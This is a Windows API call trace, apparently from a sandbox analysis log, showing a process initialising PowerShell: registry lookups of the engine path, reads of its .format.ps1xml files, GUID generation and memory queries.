[0079.645] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.645] CoTaskMemFree (pv=0x2f9460)
[0079.645] RegCloseKey (hKey=0x30c) returned 0x0
[0079.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x64f866b9, Data2=0xa1d5, Data3=0x46a3, Data4=([0]=0xb4, [1]=0x18, [2]=0x67, [3]=0xe8, [4]=0xd2, [5]=0x32, [6]=0x8f, [7]=0x70))) returned 0x0
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x4ae01a9f, Data2=0x9dcd, Data3=0x48c4, Data4=([0]=0xb0, [1]=0x1, [2]=0xb4, [3]=0xc, [4]=0xe2, [5]=0x61, [6]=0x9d, [7]=0x91))) returned 0x0
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xf100ed7d, Data2=0x2e5f, Data3=0x4827, Data4=([0]=0x91, [1]=0xcd, [2]=0x23, [3]=0xf0, [4]=0x43, [5]=0x21, [6]=0x67, [7]=0xd3))) returned 0x0
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x2b916e7, Data2=0x61cb, Data3=0x41b8, Data4=([0]=0xb6, [1]=0x89, [2]=0xeb, [3]=0xfe, [4]=0x98, [5]=0x6, [6]=0x81, [7]=0xcd))) returned 0x0
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x2800dbc1, Data2=0xdca2, Data3=0x424c, Data4=([0]=0x9a, [1]=0xdb, [2]=0xb2, [3]=0xf4, [4]=0x9e, [5]=0xa3, [6]=0x8a, [7]=0xde))) returned 0x0
[0079.649] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x5717a3f5, Data2=0x98f8, Data3=0x47d8, Data4=([0]=0xb1, [1]=0x8b, [2]=0xd0, [3]=0x32, [4]=0xa3, [5]=0xd6, [6]=0x9e, [7]=0x67))) returned 0x0
[0079.650] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.650] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x69e19782, Data2=0x7503, Data3=0x4f2b, Data4=([0]=0xb6, [1]=0xb5, [2]=0xd8, [3]=0x83, [4]=0xab, [5]=0xdc, [6]=0xd4, [7]=0xfe))) returned 0x0
[0079.650] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.650] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.650] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xc4f2a142, Data2=0xf91f, Data3=0x4f7b, Data4=([0]=0x86, [1]=0x8a, [2]=0x85, [3]=0x61, [4]=0xb0, [5]=0xb5, [6]=0xd7, [7]=0x8b))) returned 0x0
[0079.650] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x6d490f7d, Data2=0xa266, Data3=0x4d44, Data4=([0]=0xb7, [1]=0x50, [2]=0xc8, [3]=0x77, [4]=0x18, [5]=0xcf, [6]=0x28, [7]=0x82))) returned 0x0
[0079.650] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x6e6dbfac, Data2=0x2fcb, Data3=0x4994, Data4=([0]=0xbb, [1]=0xe2, [2]=0x8f, [3]=0xa4, [4]=0x96, [5]=0xa, [6]=0x1c, [7]=0xf4))) returned 0x0
[0079.651] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa6b5a931, Data2=0xac07, Data3=0x4f55, Data4=([0]=0xae, [1]=0xb7, [2]=0x6d, [3]=0x77, [4]=0xf5, [5]=0x4e, [6]=0xea, [7]=0x18))) returned 0x0
[0079.651] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.651] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x373fdc35, Data2=0x7c0e, Data3=0x41d6, Data4=([0]=0x90, [1]=0x9d, [2]=0x58, [3]=0x7, [4]=0x98, [5]=0xbf, [6]=0x40, [7]=0xbb))) returned 0x0
[0079.651] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.651] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.651] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.651] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.652] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.652] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xf3c16ede, Data2=0x620b, Data3=0x4fb1, Data4=([0]=0xad, [1]=0xf5, [2]=0x76, [3]=0x6a, [4]=0x55, [5]=0x94, [6]=0x8d, [7]=0xb4))) returned 0x0
[0079.652] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa45a0733, Data2=0x65f1, Data3=0x4b3f, Data4=([0]=0x99, [1]=0xc9, [2]=0x73, [3]=0xd8, [4]=0x3f, [5]=0xfa, [6]=0x49, [7]=0xcb))) returned 0x0
[0079.652] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x9766419f, Data2=0x509f, Data3=0x45fe, Data4=([0]=0x95, [1]=0x98, [2]=0xba, [3]=0x87, [4]=0x51, [5]=0xe1, [6]=0x4f, [7]=0x8))) returned 0x0
[0079.652] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xaee6ebb3, Data2=0xa228, Data3=0x4dea, Data4=([0]=0x84, [1]=0xac, [2]=0xbb, [3]=0xd, [4]=0xd1, [5]=0x13, [6]=0xb, [7]=0x27))) returned 0x0
[0079.652] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xcef2e1df, Data2=0xa416, Data3=0x40c5, Data4=([0]=0x9e, [1]=0xaf, [2]=0x16, [3]=0x33, [4]=0xc1, [5]=0xbb, [6]=0xc7, [7]=0x51))) returned 0x0
[0079.653] VirtualQuery (in: lpAddress=0x16bf00, lpBuffer=0x16cdc0, dwLength=0x30 | out: lpBuffer=0x16cdc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.653] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x8f17ecfa, Data2=0xba4c, Data3=0x491b, Data4=([0]=0x90, [1]=0x57, [2]=0xd6, [3]=0xc8, [4]=0x54, [5]=0xc7, [6]=0x8, [7]=0x70))) returned 0x0
[0079.653] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x320f4138, Data2=0x2884, Data3=0x4e15, Data4=([0]=0xa7, [1]=0xa9, [2]=0x64, [3]=0x18, [4]=0xd, [5]=0x6, [6]=0xf7, [7]=0x44))) returned 0x0
[0079.653] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x5bb43838, Data2=0x8ba6, Data3=0x466f, Data4=([0]=0xaf, [1]=0xf, [2]=0xc8, [3]=0x90, [4]=0x6c, [5]=0x5b, [6]=0xb1, [7]=0x49))) returned 0x0
[0079.653] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x530de00a, Data2=0x2a9b, Data3=0x4896, Data4=([0]=0xb3, [1]=0xfa, [2]=0x99, [3]=0x57, [4]=0x1a, [5]=0xd1, [6]=0x1, [7]=0x92))) returned 0x0
[0079.653] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x87c4bea8, Data2=0xf8cc, Data3=0x4e5f, Data4=([0]=0xa5, [1]=0xb5, [2]=0xf5, [3]=0x6f, [4]=0x78, [5]=0x25, [6]=0xfe, [7]=0xcf))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xc0019665, Data2=0xd3a2, Data3=0x44c0, Data4=([0]=0xbe, [1]=0x88, [2]=0xfa, [3]=0xf8, [4]=0x53, [5]=0x3c, [6]=0xc3, [7]=0xde))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x4f79774b, Data2=0x9118, Data3=0x4948, Data4=([0]=0xbe, [1]=0xb2, [2]=0x69, [3]=0xa1, [4]=0xed, [5]=0x84, [6]=0x40, [7]=0x61))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x98cf86c8, Data2=0x87ae, Data3=0x4979, Data4=([0]=0xbf, [1]=0xe2, [2]=0xbf, [3]=0x5, [4]=0x8d, [5]=0x9b, [6]=0xa7, [7]=0x9d))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xf71e1da3, Data2=0xb991, Data3=0x4f28, Data4=([0]=0x8e, [1]=0xd1, [2]=0xc4, [3]=0x5e, [4]=0x5b, [5]=0x5a, [6]=0xe7, [7]=0xfd))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x36245b68, Data2=0x28a6, Data3=0x4489, Data4=([0]=0xb2, [1]=0x12, [2]=0x1f, [3]=0x65, [4]=0x94, [5]=0xeb, [6]=0xac, [7]=0xb7))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x405e7111, Data2=0xe928, Data3=0x48d4, Data4=([0]=0xa0, [1]=0xa2, [2]=0x53, [3]=0xb4, [4]=0xbe, [5]=0xda, [6]=0x1c, [7]=0xa3))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x4c6b6483, Data2=0x6a35, Data3=0x4c28, Data4=([0]=0xb3, [1]=0xef, [2]=0xdb, [3]=0x89, [4]=0xb0, [5]=0xba, [6]=0x9a, [7]=0x9b))) returned 0x0
[0079.654] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfc576152, Data2=0x340a, Data3=0x4db9, Data4=([0]=0x81, [1]=0xd5, [2]=0x99, [3]=0xb6, [4]=0x69, [5]=0xe9, [6]=0x68, [7]=0x14))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd05ee164, Data2=0x4444, Data3=0x411a, Data4=([0]=0xb0, [1]=0x69, [2]=0x26, [3]=0x9a, [4]=0xb3, [5]=0xcd, [6]=0xfd, [7]=0xb9))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xaa4ce37e, Data2=0x5e3a, Data3=0x499b, Data4=([0]=0x88, [1]=0xc1, [2]=0x8e, [3]=0x6, [4]=0x20, [5]=0xf0, [6]=0xec, [7]=0xc2))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x31566830, Data2=0x586a, Data3=0x4529, Data4=([0]=0xb1, [1]=0xf0, [2]=0x33, [3]=0x70, [4]=0x32, [5]=0x40, [6]=0x1a, [7]=0xcd))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa6a7dbd, Data2=0x3a0c, Data3=0x4180, Data4=([0]=0xaa, [1]=0xf6, [2]=0xdf, [3]=0xa8, [4]=0x10, [5]=0x13, [6]=0x45, [7]=0x85))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x3b3ab6c7, Data2=0x2278, Data3=0x4243, Data4=([0]=0xae, [1]=0x82, [2]=0x3a, [3]=0xf0, [4]=0x20, [5]=0x3c, [6]=0x23, [7]=0xd7))) returned 0x0
[0079.655] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xb4cb0910, Data2=0xec2e, Data3=0x486c, Data4=([0]=0xb3, [1]=0xb6, [2]=0x13, [3]=0xb2, [4]=0x25, [5]=0x40, [6]=0xa9, [7]=0x6))) returned 0x0
[0079.655] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.656] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.656] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.657] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7877f7b9, Data2=0xe88a, Data3=0x48a4, Data4=([0]=0xb3, [1]=0xc0, [2]=0xae, [3]=0xbf, [4]=0xcd, [5]=0x1, [6]=0xbc, [7]=0x30))) returned 0x0
[0079.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.657] SetErrorMode (uMode=0x1) returned 0x1
[0079.657] SetErrorMode (uMode=0x1) returned 0x1
[0079.657] GetFileType (hFile=0x30c) returned 0x1
[0079.716] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.716] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.717] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.717] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.717] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x119, lpOverlapped=0x0) returned 1
[0079.717] ReadFile (in: hFile=0x30c, lpBuffer=0x36459b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36459b8*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.717] CloseHandle (hObject=0x30c) returned 1
[0079.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.720] SetErrorMode (uMode=0x1) returned 0x1
[0079.720] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.730] SetErrorMode (uMode=0x1) returned 0x1
[0079.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.731] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.731] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.731] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
[0079.731] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.731] CoTaskMemFree (pv=0x2f9460)
[0079.731] RegCloseKey (hKey=0x30c) returned 0x0
[0079.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.732] VirtualQuery (in: lpAddress=0x16bb00, lpBuffer=0x16c9c0, dwLength=0x30 | out: lpBuffer=0x16c9c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.732] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x61eb0320, Data2=0xb140, Data3=0x4e5e, Data4=([0]=0x9f, [1]=0xa7, [2]=0xe8, [3]=0xd7, [4]=0xb, [5]=0x34, [6]=0xcb, [7]=0xbd))) returned 0x0
[0079.733] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.733] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xc8ffa500, Data2=0x7d08, Data3=0x417e, Data4=([0]=0x9f, [1]=0xfd, [2]=0x96, [3]=0x42, [4]=0xd3, [5]=0xf3, [6]=0x4c, [7]=0x9a))) returned 0x0
[0079.733] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x821b46ef, Data2=0x5d18, Data3=0x483c, Data4=([0]=0x80, [1]=0xc6, [2]=0x27, [3]=0xc2, [4]=0x85, [5]=0x42, [6]=0xad, [7]=0xab))) returned 0x0
[0079.733] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x23b48ff9, Data2=0x724c, Data3=0x4989, Data4=([0]=0xb8, [1]=0x95, [2]=0x8f, [3]=0xeb, [4]=0xf6, [5]=0xf5, [6]=0xaa, [7]=0x79))) returned 0x0
[0079.733] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.733] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.734] SetErrorMode (uMode=0x1) returned 0x1
[0079.734] SetErrorMode (uMode=0x1) returned 0x1
[0079.734] GetFileType (hFile=0x30c) returned 0x1
[0079.758] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.758] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.758] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.758] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.758] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.759] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.759] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.759] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
